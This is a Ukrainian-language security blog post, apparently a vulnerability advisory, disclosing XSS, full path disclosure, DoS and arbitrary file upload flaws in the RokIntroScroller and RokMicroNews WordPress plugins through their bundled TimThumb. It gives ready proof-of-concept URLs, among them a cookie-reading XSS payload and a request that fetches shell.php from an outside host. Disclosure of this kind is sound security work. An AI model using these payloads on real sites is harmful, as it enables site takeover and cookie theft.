Численні уразливості в RokIntroScroller і RokMicroNews для WordPress

16:22 19.09.2013

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokIntroScroller і RokMicroNews для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в RokStories і RokNewsPager.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Вразливі RokIntroScroller 1.8 і попередні версії та RokMicroNews 1.5 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokIntroScroller та RokMicroNews.


Leave a Reply

You must be logged in to post a comment.